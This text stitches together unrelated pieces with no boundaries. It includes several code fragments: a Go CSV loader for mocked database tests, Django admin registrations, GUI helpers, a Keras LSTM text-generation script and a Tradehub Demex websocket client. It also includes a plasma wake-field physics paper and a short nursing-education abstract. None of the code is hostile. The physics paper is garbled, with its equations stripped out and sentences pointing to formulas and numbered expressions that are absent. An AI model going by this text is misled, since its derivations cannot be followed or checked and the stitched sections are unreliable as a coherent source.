        *n_hits += hits;
    }
    return byte;
}
// WithTemplates overrides the default templates (entgql.AllTemplates)
// with specific templates.
func WithTemplates(templates ...*gen.Template) ExtensionOption {
	return func(ex *Extension) error {
		ex.templates = templates
		return nil
	}
}
def show_ui_component(builder, component: str, show: bool):
    widget = builder.get_object(component)
    if show:
        widget.show()
    else:
        widget.hide()
// LoadCSV loads a csv file for mocked database testing. Like
// github.com/DATA-DOG/go-sqlmock does.
// CSV file should be comma separated.
func LoadCSV(opts ...csvOptions) (columns []string, rows [][]driver.Value, err error) {
	cfg := new(config)
	for _, opt := range opts {
		opt(cfg)
	}

	f, err := os.Open(cfg.path)
	if err != nil {
		err = errors.Wrap(err, "[cstesting] os.Open")
		return
	}

	csvReader := csv.NewReader(f)
	if cfg.cc != nil {
		if cfg.cc.Comma > 0 {
			csvReader.Comma = cfg.cc.Comma
		}
		if cfg.cc.Comment > 0 {
			csvReader.Comment = cfg.cc.Comment
		}
		if cfg.cc.FieldsPerRecord > 0 {
			csvReader.FieldsPerRecord = cfg.cc.FieldsPerRecord
		}
		if cfg.cc.LazyQuotes != nil {
			csvReader.LazyQuotes = *cfg.cc.LazyQuotes
		}
		if cfg.cc.TrimLeadingSpace != nil {
			csvReader.TrimLeadingSpace = *cfg.cc.TrimLeadingSpace
		}
	}

	j := 0
	for {
		var res []string
		res, err = csvReader.Read()
		switch {
		case err == io.EOF:
			err = nil
			return
		case err != nil:
			err = errors.Wrap(err, "[cstesting] csvReader.Read")
			return
		case res == nil:
			err = errors.Fatal.Newf("[cstesting] Cannot read from csv %q", cfg.path)
			return
		}
		// First row supplies the column names; subsequent rows become values
		if j == 0 {
			columns = make([]string, len(res))
		}
		row := make([]driver.Value, len(res))
		for i, v := range res {
			v = strings.TrimSpace(v)
			if j == 0 {
				columns[i] = v
			} else {
				b := parseCol(cfg, v)
				row[i] = b
			}
		}
		if j > 0 {
			rows = append(rows, row)
		}
		j++
	}
}
Three-dimensional wake fields generated in plasma by a cylindrical electron bunch

Expressions for the wake fields generated in plasma (in a plasma waveguide or in unbounded plasma) by a relativistic electron bunch are derived and analyzed for the cases of the presence and absence of a strong external longitudinal magnetic field. For both cases a comparative analysis of the dependence of the field amplitudes on the parameters of the electron bunch is given.

New methods of charged-particle acceleration based on wake fields generated in plasma by laser radiation (BWA (Beat-Wave Acceleration), LWFA (Laser Wake Field Acceleration)) and by bunches of relativistic particles (PWFA (Plasma Wake-Field Acceleration)) moving in plasma are presently under intensive development (see, e.g., the reviews and the literature cited there). The accelerating fields attained by these methods (of the order of $10^7-10^8$ V/cm) can be used both for charge acceleration and for focusing of electron (positron) bunches, in order to obtain beams of high density and to ensure high luminosity in the linear colliders of the next generation. The linear theory of wake-field generation by two- and three-dimensional rigid bunches of charged particles in unbounded and bounded plasma was developed in many works. The nonlinear theory of wake-field generation by a rigid one-dimensional bunch of finite extent and by sequences of charged-particle bunches was developed in . It was shown that the optimum condition for wave generation is $n_b = n_0/2$ ($n_b$, $n_0$ being the densities of the bunch and plasma electrons, respectively). 
An important result of this theory is the demonstration that, in the case of nonlinear wake fields, the transformation ratio $R = E_{ac}/E_{st}$ ($E_{ac}$ and $E_{st}$ being the magnitudes of the accelerating and decelerating electric fields, respectively) depends on the gamma-factor of the accelerating bunch and may be significant without the special bunch shaping that is needed in the case of linear wake fields generated by a rigid bunch. The conclusion of the results mentioned above is reaffirmed in for the assumption (where $v_0$ is the bunch velocity), which leads to an incorrect expression for the maximum value of the accelerating field $E_{ac}$ (at $n_b/n_0 = 1/2$, $E_{ac} = \infty$). The influence of the transverse sizes of the bunch on the nonlinear wake field generated by short bunches ($d \ll \lambda_p$, where $d$ is the bunch length and $\lambda_p$ the wavelength) was considered in . A nonlinear theory of wake-field generation by two- and three-dimensional bunches in the general case has not yet been developed. This work contains the results and analysis of the solution of the linear equations describing the interaction of an axially symmetric homogeneous bunch of charged particles with plasma, in the hydrodynamic description and under the assumption of the absence of plasma vorticity (laminar flow), as well as with a strong external constant magnetic field applied along the direction of the bunch motion, when the transverse motion of plasma electrons is suppressed.

Basic equations

The vector equation describing the excitation of nonlinear three-dimensional wake fields by a rigid bunch of charged particles with electron density $n_b$, moving with constant velocity $v_0$ along the $z$ axis through cold plasma at equilibrium with density $n_0$, in the hydrodynamic description and under the assumption of the absence of plasma vorticity, is given by the following formula $\left(\nabla\nabla - \nabla^{2} + \frac{1}{c^{2}}\,\cdots\right)$ where $\rho = p/mc$ is the dimensionless momentum of the plasma electrons, $A$ is the vector potential of the electromagnetic field, $k_p = \omega_p/v_0$, $\omega_p = (4\pi n_0 e^2/m)^{1/2}$ is the electron plasma frequency, $\beta_0 = v_0/c$, and $n_b$ is an arbitrary function of coordinates and time. 
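As a quick numerical illustration (not part of the original paper), the plasma frequency $\omega_p = (4\pi n_0 e^2/m)^{1/2}$ and the corresponding plasma wavelength $\lambda_p \approx 2\pi c/\omega_p$ (for $v_0 \approx c$) can be evaluated in Gaussian units; the density value below is an arbitrary example:

```python
import math

# Gaussian (CGS) constants
e = 4.80320425e-10   # electron charge, statcoulomb
m = 9.1093837e-28    # electron mass, g
c = 2.99792458e10    # speed of light, cm/s

def plasma_frequency(n0):
    """omega_p = sqrt(4*pi*n0*e^2/m) in rad/s, for density n0 in cm^-3."""
    return math.sqrt(4.0 * math.pi * n0 * e**2 / m)

n0 = 1.0e16                             # example plasma density, cm^-3
omega_p = plasma_frequency(n0)          # ~5.6e12 rad/s
lambda_p = 2.0 * math.pi * c / omega_p  # plasma wavelength for v0 ~ c, in cm

# omega_p scales as sqrt(n0): quadrupling the density doubles the frequency
assert abs(plasma_frequency(4 * n0) / omega_p - 2.0) < 1e-12
```

This scaling is why the condition $d \ll \lambda_p$ for "short" bunches depends directly on the plasma density.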
The similar equation, describing interaction between laser pulse and the plasma, was obtained in . Let as consider axial-symmetrical bunch, when ρ depends only on variable r and z = z − v 0 t (steady state). In this case vector ρ has only longitudinal ρ z and radial ρ r components, which do not depend on azimuthal angle ϕ, and ρ ϕ = 0. The system of equations for the component of momentum ρ z and ρ r has the following form: Inserting in (3) and (4) ρ r = 0 and ρ z = ρ z ( z) (dependence on r is absent) we come to the onedimensional nonlinear equation, considered in Inserting in (4) ρ r = 0 and expressing the derivative ∂ρ z /∂ z through derivatives of ρ z we receive for scalar potential ϕ the following equation, describing interaction of electron bunch with plasma in the presence of the external magnetic field B 0 (0, 0, B 0 ) : where 3 Wakefield generating at vorticity absence Let us consider the problem of wake field generating by rigid cylindrical bunch of radius a and horizontal dimension d with homogeneous distribution of electrons of the bunch moving in conducting plasma waveguide of radius b ≥ a. Assuming in (3) and (4) n b /n 0 ≪ 1 (linear approximation) and linearizing the system on ρ we shall obtain the following system of equations, describing the process under consideration: To define ρ z (r, z) and ρ r (r, z) let us perform the Hankel transformation of the equations system (9) on r in the finite limits (0, b) and solving the obtained equations on z in the assumption of the continuity conditions of the momentum components ρ z , ρ r and components of the electrical field E z = mcv0 at the front ( z = d) and rear ( z = 0) bunch boundaries we shall receive the following expression for the field components E z and E r : in the corresponding areas on r. 
Before the bunch (0 ≤ r ≤ a ≤ b, d ≤ z ≤ ∞) we have the following expression for the field components: After the bunch (−∞ ≤ z ≤ 0) we have ×(k p a) The components different from zero B ϕ of E-wave (E z , E r , B ϕ ) magnetic field is determining by the formula B ϕ = mc 2 e ∂ρ r ∂ z − ∂ρ z ∂r (22) and is described by the following expressions In formulas (10)-(25) J 0 , J 1 are the Bessel functions, and I 0 , I 1 , K 0 , K 1 -are the modified Bessel functions, κ 2 = k 2 p β 2 0 + µ 2 n /b 2 . As it may be seen from the given expressions for field components E z , E r they consist of periodic (wake field) and non-periodic ("Coulomb") parts. Before the bunch the field has only non-periodic part, which exponentially falls of with the remote from the front boundary, so that part may be neglected. After the bunch the "Coulomb" part also falls off exponentially with the remote from the rear boundary z = 0 and only periodic wake field remains. Magnetic field component B ϕ has only non-periodic "Coulomb" part, which exponentially also decreases at the remote from the bunch boundaries and it can be ignored. In the range of 0 ≤ z ≤ d, where magnetic field is not small, the radial force f r = −eE r + eβ 0 B ϕ acting on the bunch electrons, and this force in some ranges on z can compress the bunch, focusing it. Before the bunch ( z ≥ d) and in the range of wake field ( z ≤ 0) the component of the magnetic field B ϕ is small and the radial force is f r ≈ −eE r . Below one can find an expression for the radial force f r acting on the bunch (0 ≤ z ≤ d) at β 0 ≈ 1, where O(γ −2 0 ) is the smaller defocusing part of the force. Let us also give an expressions for the fields E z and E r inside and after the bunch in the case when a = b and in the case when b → ∞ (unlimited plasma): and E IV zH , E IV rH → 0 at z < 0. At the a → ∞ I 0 (k p a) → ∞ and the expressions for E I z and E IV z coincide with the expressions for one-dimensional bunch, while E I r and E IV r → 0. 
At k p a ≪ 1 (k p r < k p a ≪ 1) periodic parts of the fields E I,IV z and E I,IV r are proportional to (k p a) 2 and k p r. Non-periodic parts are small at γ 0 ≫ 1. The expressions for E z and E r inside the bunch and in the wake field at b → ∞, γ 0 ≫ 1 go over into corresponding expressions for the case with unlimited plasma. In this case at k p r ≪ 1, k p a ≪ 1 (r > a or r < a) the longitudinal fields inside and over the bunch as well as in the wake are proportional to (k p a) 2 , while the radial components of the fields E I,IV r ∼ r/2a at r < a and E I,IV r ∼ a/2r at r > a, e.g. they increase with the remote from the bunch centre inside the bunch and decrease with the remote from the bunch boundaries inside it. Let us define the plasma density for the mentioned four regions. From the Poisson equation it follows that n e = − 1 4πe In the regions outside the bunch in (29) we should suppose n b = 0. Using the expressions (10)-(21) for the fields we shall find out the following expressions for the plasma densities: Thus, the density n e depends periodically on z inside and after the electron bunch at r ≤ a and does not depend on r and sizes a and b. Wake field excitation under strong external magnetic field The linear equation for the potential ϕ, describing the interaction of cylindrical electron bunch of radius a and length d with unlimited cold plasma, follows from expressions (6), (7) in assumption eϕ/mc 2 ≪ 1, n b /n 0 ≪ 1 and has the following form: where n b is given by the expression (8). Before the bunch ( z ≥ d), where n b = 0, h = 0 the potential ϕ(r, z) is assumed as equal to zero (we ignore the "Coulomb" field, see chapter 3). 
Solving the equation under assumption of continuity of the potential ϕ(α, z) on the front ( z = d) and rear ( z = 0) boundaries of the bunch, we shall come to the following expressions for ϕ(r, z) in the ranges inside and over the bunch (0 ≤ z ≤ d, 0 ≤ r ≤ a, a ≤ r < ∞) where k has the positive imaginary part Imk = k After the bunch ( z ≤ 0, 0 ≤ r < ∞) the potential ϕ has the following form: Because the "Coulomb" components (α 2 > k 2 ) are small one can ignore them and bring out the expression of square brackets from the integral in the point α = 0, where it makes the main input into the integral. In this case the expressions (35), (36) significantly simplify: The components of the fields are determined from the expressions: Inside the bunch (0 ≤ r ≤ a, 0 ≤ z ≤ d) we have: and on the other hand, there is more distinctly expressed dependence on γ-factor of the bunch. Besides, magnetic wake field B ϕ is equal to zero in plasma without the field and defers from zero in the case of plasma with B 0 = 0.
Mobilizing Education to Nurses at the Bedside. After a survey revealed practice gaps in central venous catheter care, one organization was challenged to identify a novel approach to educate nurses. Through a search for evidence, a project workgroup discovered an existing but beneficial teaching method, using a mobile cart to deliver meaningful education at the point of care. Successful outcomes and sustained practice change were realized.
from django.contrib import admin

from .models import *

admin.site.register(Usuario)
admin.site.register(Turma)
admin.site.register(Aula)
admin.site.register(Exercicio)
admin.site.register(Experimentacao)
admin.site.register(Pergunta)
# admin.site.register(Tema)
admin.site.register(Usuario_Pergunta)
admin.site.register(Aluno_Exercicio)
admin.site.register(Aluno_Aula)
admin.site.register(Aluno_Turma)
admin.site.register(Forum)
admin.site.register(Resposta)
admin.site.register(Teste)
# admin.site.register(Tema_Turma)
admin.site.register(Document)
def save(self) -> None:
    tmp_list = self.listbox_num.get(0, END)
    # the context manager closes the file even if a write fails
    with open('num_list.csv', 'w') as file:
        for tmp in tmp_list:
            file.write(tmp + '\n')
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.layers import LSTM
import numpy as np
import random
import sys
import os
import io
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('weights',
                    help='''Path to the weights that were either pretrained or
                    generated with train.py.''')
parser.add_argument('-data', default='training_data.txt',
                    help='''Dataset to use for generating words. Should be same as
                    one used for training. Default: "training_data.txt"''')
parser.add_argument('-randomness', type=float, default=0.05,
                    help='''The exponential factor determining the predicted
                    character to be chosen. Do not change unless you know what
                    you're doing. Default: 0.05''')
parser.add_argument('-length', type=int, default=500,
                    help='''Length of text to generate. Default: 500''')
parser.add_argument('-out_file', default='output.txt',
                    help='''Generated output. Default: "output.txt"''')
parser.add_argument('-seed', default='',
                    help='''Seed to use to generate the text.
                    Default: Chooses random text from the dataset.''')
args = vars(parser.parse_args())

if not os.path.isfile(args['weights']):
    print("Weights file not found!")

path = args['data']
with io.open(path, encoding='utf-8') as f:
    text = f.read()
chars = sorted(list(set(text)))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))

# cut the text in semi-redundant sequences of maxlen characters
maxlen = 40
step = 3
sentences = []
next_chars = []
for i in range(0, len(text) - maxlen, step):
    sentences.append(text[i: i + maxlen])
    next_chars.append(text[i + maxlen])

print('Vectorization...')
x = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)
y = np.zeros((len(sentences), len(chars)), dtype=np.bool)
for i, sentence in enumerate(sentences):
    for t, char in enumerate(sentence):
        x[i, t, char_indices[char]] = 1
    y[i, char_indices[next_chars[i]]] = 1

# build the model: 2 LSTM
print('Build model...')
model = Sequential()
model.add(LSTM(128, input_shape=(maxlen, len(chars)), return_sequences=True))
model.add(LSTM(128))
model.add(Dense(len(chars)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.load_weights(args['weights'])

start_index = random.randint(0, len(text) - maxlen - 1)
generated = ''
sentence = args['seed']
if sentence == '' or len(sentence) != 40:
    sentence = text[start_index: start_index + maxlen - 20]
generated += sentence
print('\n----- Generating with seed: "' + sentence.replace("\n", "\\n") + '" -----\n\n')

with open(args['out_file'], 'w') as f:
    sys.stdout.write(generated)
    f.write(generated)
    for i in range(args['length']):
        x_pred = np.zeros((1, maxlen, len(chars)))
        for t, char in enumerate(sentence):
            x_pred[0, t, char_indices[char]] = 1.
        preds = np.asarray(model.predict(x_pred, verbose=0)[0]).astype('float')
        preds = np.exp(np.log(preds * args['randomness']))
        preds /= np.sum(preds)
        preds = np.random.multinomial(1, preds, 1)
        next_index = np.argmax(preds)
        next_char = indices_char[next_index]
        generated += next_char
        sentence = sentence[1:] + next_char
        sys.stdout.write(next_char)
        f.write(next_char)
        sys.stdout.flush()
        f.flush()
    f.write('\n')
    f.flush()

print()
print('----- DONE -----')
print("Written output to:", args['out_file'])
def add_message(self, player, message):
    connection_id = player.connection_id
    if connection_id not in self.messages:
        self.messages[connection_id] = []
    self.messages[connection_id].append(message)
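The check-then-append pattern above is commonly collapsed with `dict.setdefault` (or `collections.defaultdict`); a small standalone sketch of the same behavior:

```python
messages = {}

def add_message(messages, connection_id, message):
    # setdefault inserts the empty list only when the key is missing,
    # then returns the (possibly pre-existing) list to append to
    messages.setdefault(connection_id, []).append(message)

add_message(messages, 42, "hello")
add_message(messages, 42, "world")
# messages == {42: ["hello", "world"]}
```

Either form works; `setdefault` just removes the race between the membership test and the insertion and keeps the method to a single statement.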
class DemexWebsocket: """ DemexWebsocket is a high-level async implementation off the official Tradehub Demex websocket and provides all functionalities described in the documentation. """ def __init__(self, uri: str, ping_interval: Optional[int] = 10, ping_timeout: Optional[int] = 30): """ Create a websocket which is complaint with the specification provided by the offical documentation. .. see:: https://docs.switcheo.org/#/?id=websocket :param uri: Websocket URI, starting with 'ws://' or 'wss://' e.g. 'ws://85.214.81.155:5000/ws' :param ping_interval: Interval for pinging the server in seconds. :param ping_timeout: Time after no response for pings are considered as timeout in seconds. """ self._uri: str = uri self._ping_interval: int = ping_interval self._ping_timeout: int = ping_timeout self._websocket: Optional[websockets.WebSocketClientProtocol] = None async def subscribe(self, message_id: str, channels: List[str]): """ Subscribe to one or many channels. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param channels: List with channels to join. :return: None """ await self.send({ "id": message_id, "method": "subscribe", "params": {"channels": channels} }) async def unsubscribe(self, message_id: str, channels: List[str]): """ Unsubscribe to one or many channels. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param channels: List with channels to leave. :return: None """ await self.send({ "id": message_id, "method": "unsubscribe", "params": {"channels": channels} }) async def subscribe_leverages(self, message_id: str, swth_address: str): """ Subscribe to wallet specific leverages channel. .. warning:: This channel has not been tested yet. 
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :return: None """ # TODO not tested yet channel_name: str = f"leverages.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_market_stats(self, message_id: str): """ Subscribe to market stats. Example:: ws_client.subscribe_market_stats('market_stats') The initial channel message is expected as:: { 'id':'market_stats', 'result': ['market_stats'] } The subscription and channel messages are expected as follow:: { 'channel': 'market_stats', 'sequence_number': 484, 'result': { 'cel1_usdc1': { 'day_high': '5.97', 'day_low': '5.72', 'day_open': '5.86', 'day_close': '5.74', 'day_volume': '414.4', 'day_quote_volume': '2429.009', 'index_price': '0', 'mark_price': '0', 'last_price': '5.74', 'market': 'cel1_usdc1', 'market_type': 'spot', 'open_interest': '0' } ... } } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :return: None """ channel_name: str = "market_stats" await self.subscribe(message_id, [channel_name]) async def subscribe_books(self, message_id: str, market: str): """ Subscribe to book channel. Example:: ws_client.subscribe_books('orderbook', "swth_eth1') The initial channel message is expected as:: { 'id':'orderbook', 'result': ['books.eth1_usdc1', ...] } The initial subscription message is expected as:: { 'channel': 'books.eth1_usdc1', 'sequence_number': 924, 'result': [ { 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'side': 'sell', 'type': 'new' }, ... { 'market': 'eth1_usdc1', 'price': '1790.1', 'quantity': '0.02', 'side': 'buy', 'type': 'new' } ... 
] } The channel update messages are expected as:: { 'channel': 'books.eth1_usdc1', 'sequence_number': 924, 'result': [ { 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0', 'side': 'sell', 'type': 'delete' }, ... { 'market': 'eth1_usdc1', 'price': '1800.18', 'quantity': '-0.43', 'side': 'sell', 'type': 'update' }, ... { 'market': 'eth1_usdc1', 'price': '1114.48', 'quantity': '182.716', 'side': 'buy', 'type': 'new' } ] } .. note:: The initial message is a snapshot of the current orderbook. The following messages are delta messages to that snapshot. Each message has a 'sequence_number'. Updates can contain the update types 'new', 'update' or 'delete'. The quantity in an 'update' message can be negative, indicating a reduction, while a positive value means an increment. All updates need to be processed in the provided order to maintain a consistent orderbook. .. warning:: The initial snapshot is a partial orderbook with a total of 100 entries! Expect to receive updates for orders outside the locally managed orderbook. Ignore these updates or reconnect to maintain the local orderbook. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ channel_name: str = f"books.{market}" await self.subscribe(message_id, [channel_name]) async def subscribe_orders(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to orders channel. .. note:: The market identifier is optional and acts as a filter.
Example:: ws_client.subscribe_orders('orders', "swth1...abcd') The initial channel message is expected as:: { 'id':'orders', 'result': ['orders.swth1...abcd'] } The channel update messages are expected as:: { 'channel': 'orders.swth1...abcd', 'result': [ { 'order_id': '7CBBF51B75CF2E046726BB...56757D6D502B01F4BB62178DCF', 'block_height': 7375724, 'triggered_block_height': 0, 'address': 'swth1...abcd', 'market': 'eth1_wbtc1', 'side': 'sell', 'price': '0', 'quantity': '0.08', 'available': '0.08', 'filled': '0', 'order_status': 'pending', 'order_type': 'market', 'initiator': 'user', 'time_in_force': 'fok', 'stop_price': '0', 'trigger_type': '', 'allocated_margin_denom': 'eth1', 'allocated_margin_amount': '0', 'is_liquidation': False, 'is_post_only': False, 'is_reduce_only': False, 'type': 'new', 'block_created_at': '2021-02-11T20:36:02.244175356Z', 'username': '', 'id': '' } ... ] } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ if market: channel_name: str = f"orders_by_market.{market}.{swth_address}" else: channel_name: str = f"orders.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_positions(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to positions channel. .. note:: The market identifier is optional and acts as a filter. .. warning:: This channel is not tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 
'swth_eth1' :return: None """ # TODO not tested yet if market: channel_name: str = f"positions_by_market.{market}.{swth_address}" else: channel_name: str = f"positions.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_recent_trades(self, message_id: str, market: str): """ Subscribe to recent trades. Example:: ws_client.subscribe_recent_trades('trades', "swth_eth1') The initial channel message is expected as:: { 'id': 'trades', 'result': ['recent_trades.swth_eth1'] } The channel update messages are expected as:: { 'channel': 'recent_trades.eth1_usdc1', 'sequence_number': 812, 'result': [ { 'id': '0', 'block_created_at': '2021-02-11T20:49:07.095418551Z', 'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856', 'taker_address': 'swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p', 'taker_fee_amount': '0.00002', 'taker_fee_denom': 'eth1', 'taker_side': 'buy', 'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E', 'maker_address': 'swth1wmcj8gmz4tszy5v8c0d9lxnmguqcdkw22275w5', 'maker_fee_amount': '-0.00001', 'maker_fee_denom': 'eth1', 'maker_side': 'sell', 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'liquidation': '', 'taker_username': '', 'maker_username': '', 'block_height': '7376096' }, ... ] } .. warning:: The field 'id' is sometimes '0'. This endpoint/channel does not seem to work correct. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ channel_name: str = f"recent_trades.{market}" await self.subscribe(message_id, [channel_name]) async def subscribe_account_trades(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to account trades. 
Example:: ws_client.subscribe_account_trades('account', 'swth...abcd', 'eth1_usdc1') # or for all markets ws_client.subscribe_account_trades('account', "swth...abcd') The initial channel message is expected as:: { 'id': 'account', 'result': ['account_trades_by_market.eth1_usdc1.swth1...abcd'] } # or for all markets { 'id': 'account', 'result': ['account_trades.swth1...abcd'] } The channel update messages are expected as:: { 'channel': 'recent_trades.eth1_usdc1', 'sequence_number': 812, 'result': [ { 'id': '0', 'block_created_at': '2021-02-11T20:49:07.095418551Z', 'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856', 'taker_address': 'swth1...taker', 'taker_fee_amount': '0.00002', 'taker_fee_denom': 'eth1', 'taker_side': 'buy', 'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E', 'maker_address': 'swth1...maker', 'maker_fee_amount': '-0.00001', 'maker_fee_denom': 'eth1', 'maker_side': 'sell', 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'liquidation': '', 'taker_username': '', 'maker_username': '', 'block_height': '7376096' }, ... ] } .. note:: The market identifier is optional and acts as a filter. .. warning:: The field 'id' is '0' all the time. This endpoint/channel does not seem to work correct. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ if market: channel_name: str = f"account_trades_by_market.{market}.{swth_address}" else: channel_name: str = f"account_trades.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_balances(self, message_id: str, swth_address: str): """ Subscribe to wallet specific balance channel. 
Example:: ws_client.subscribe_balances('balance', "swth1...abcd') The initial channel message is expected as:: { 'id': 'balance', 'result': ['balances.swth1...abcd'] } The subscription and channel messages are expected as follow:: { 'channel': 'balances.swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p', 'result': { 'eth1': { 'available': '0.83941506825', 'order': '0', 'position': '0', 'denom': 'eth1' }, ... } } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :return: None """ channel_name: str = f"balances.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_candlesticks(self, message_id: str, market: str, granularity: int): """ Subscribe to candlesticks channel. Example:: ws_client.subscribe_candlesticks('candle', "swth_eth1', 1) The initial channel message is expected as:: { 'id': 'candle', 'result': ['candlesticks.swth_eth1.1'] } The subscription and channel messages are expected as follow:: { 'channel': 'candlesticks.swth_eth1.1', 'sequence_number': 57, 'result': { 'id': 0, 'market':'swth_eth1', 'time': '2021-02-17T10:59:00Z', 'resolution': 1, 'open': '0.000018', 'close': '0.000018', 'high': '0.000018', 'low': '0.000018', 'volume': '5555', 'quote_volume': '0.09999' } } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :param granularity: Define the candlesticks granularity. Allowed values: 1, 5, 15, 30, 60, 360, 1440. :return: None """ if granularity not in [1, 5, 15, 30, 60, 360, 1440]: raise ValueError(f"Granularity '{granularity}' not supported. 
Allowed values: 1, 5, 15, 30, 60, 360, 1440") channel_name: str = f"candlesticks.{market}.{granularity}" await self.subscribe(message_id, [channel_name]) async def get_order_history(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request up to 200 order histories. Example:: ws_client.get_order_history('order_history', "swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p") The expected return result for this function is as follows:: { "id": "order_history", "result": [ { "order_id": "C7D7DDDCFDC68DF2D078CBD8630B657148893AC24CF8DB8F2E23293C6EDC90AD", "block_height": 7561537, "triggered_block_height": 0, "address": "swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p", "market": "wbtc1_usdc1", "side": "sell", "price": "0", "quantity": "0.0011", "available": "0", "filled": "0.0011", "order_status": "filled", "order_type": "market", "initiator": "user", "time_in_force": "fok", "stop_price": "0", "trigger_type": "", "allocated_margin_denom": "wbtc1", "allocated_margin_amount": "0", "is_liquidation": false, "is_post_only": false, "is_reduce_only": false, "type": "", "block_created_at": "2021-02-16T08:31:13.225303Z", "username": "", "id": "2315998" }, ... ] } .. note:: The market identifier is optional and acts as a filter. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ await self.send({ "id": message_id, "method": "get_order_history", "params": { "address": swth_address, "market": market } }) async def get_recent_trades(self, message_id: str, market: str): """ Request up to 100 recent trades for a market. 
Example:: ws_client.get_recent_trades('recent_trades', "swth_eth1") The expected return result for this function is as follows:: { "id": "recent_trades", "sequence_number": 3, "result": [ { "id": "0", "block_created_at": "2021-02-16T10:21:31.346041707Z", "taker_id": "3F71918F83D84639F505464335FD355105EE63E622CBB819AAFBBAC97368CC7A", "taker_address": "swth1ysezxr46dhd4dzjsswqte35wfm0ml5dxx97aqt", "taker_fee_amount": "3.2475", "taker_fee_denom": "swth", "taker_side": "buy", "maker_id": "343590CF4F54FEB1E2429F60B77CD3BED701A040418AEB914BB41D561E24E7DE", "maker_address": "swth1a5v8pyhkzjjmyw03mh9zqfakwyu0t5wkv0tf66", "maker_fee_amount": "-0.6495", "maker_fee_denom": "swth", "maker_side": "sell", "market": "swth_eth1", "price": "0.0000182", "quantity": "1299", "liquidation": "", "taker_username": "", "maker_username": "", "block_height": "7564715" }, ... ] } .. warning:: The field 'id' is sometimes '0'. This endpoint/channel does not seem to work correct. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ await self.send({ "id": message_id, "method": "get_recent_trades", "params": { "market": market } }) async def get_candlesticks(self, message_id: str, market: str, granularity: int, from_epoch: int, to_epoch: int): """ Requests candlesticks for market with granularity. Example:: ws_client.get_candlesticks('recent_trades', "swth_eth1") The subscription and channel messages are expected as follow:: { 'id': 'candlesticks.swth_eth1.1', 'sequence_number': 57, 'result': [ { 'id': 0, 'market':'swth_eth1', 'time': '2021-02-17T10:59:00Z', 'resolution': 1, 'open': '0.000018', 'close': '0.000018', 'high': '0.000018', 'low': '0.000018', 'volume': '5555', 'quote_volume': '0.09999' } ] } .. note:: Only candles with non empty volume will be returned. 
